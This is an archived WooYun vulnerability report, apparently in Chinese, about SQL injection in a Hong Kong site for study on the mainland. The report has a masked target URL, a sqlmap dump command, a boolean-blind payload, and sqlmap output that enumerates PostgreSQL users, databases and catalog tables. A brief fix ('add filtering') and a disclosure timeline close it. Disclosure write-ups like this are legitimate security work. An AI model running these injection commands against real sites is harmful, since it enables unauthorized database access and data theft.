乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-28: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
香港香島內地升學資源網某處存在SQL插入攻擊
測試地址:http://**.**.**.**/pagelisting.php?id=P00070
python sqlmap.py -u "http://**.**.**.**/pagelisting.php?id=P00070" --batch --technique=BEU --threads=10 -D pg_catalog -T pg_db_role_setting --dump-all
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLcurrent user: 'userweb'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLcurrent user: 'userweb'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLdatabase management system users [2]:[*] pgman[*] userwebsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLavailable databases [3]:[*] information_schema[*] pg_catalog[*] publicsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLDatabase: pg_catalog[51 tables]+-------------------------+| pdZammj || pg_aggregate || pg_am || pg_amproc || pg_attrdef || pg_attribute || pg_auth_members || pg_authid || pg_cast || pg_class || pg_collation || pg_constraint || pg_conversion || pg_database || pg_db_role_setting || pg_default_acl || pg_depend || pg_description || pg_enum || pg_event_trigger || pg_extension || pg_foreign_data_wrapper || pg_foreign_server || pg_foreign_table || pg_index || pg_inherits || pg_language || pg_largeobject || pg_largeobject_metadata || pg_namespace || pg_opclass || pg_operator || pg_opfamily || pg_pltemplate || pg_proc || pg_range || pg_rewrite || pg_seclabel || pg_shdepend || pg_shdescription || pg_shseclabel || pg_statistic || pg_tablespace || pg_trigger || pg_ts_config || pg_ts_config_map || pg_ts_dict || pg_ts_parser || pg_ts_template || pg_type || pg_user_mapping |+-------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLDatabase: pg_catalogTable: pg_auth_members[4 columns]+--------------+------+| Column | Type |+--------------+------+| admin_option | bool || grantor | oid || member | oid || roleid | oid |+--------------+------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLDatabase: pg_catalogTable: pg_user_mapping[3 columns]+-----------+-------+| Column | Type |+-----------+-------+| umoptions | _text || umserver | oid || umuser | oid |+-----------+-------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj---web application technology: Apache 2.2.11, PHP 5.2.8back-end DBMS: PostgreSQLDatabase: pg_catalogTable: pg_db_role_setting[3 columns]+-------------+-------+| Column | Type |+-------------+-------+| setconfig | _text || setdatabase | oid || setrole | oid |+-------------+-------+
增加過濾
危害等级:高
漏洞Rank:12
确认时间:2015-10-30 19:05
已將事件通知有關機構
暂无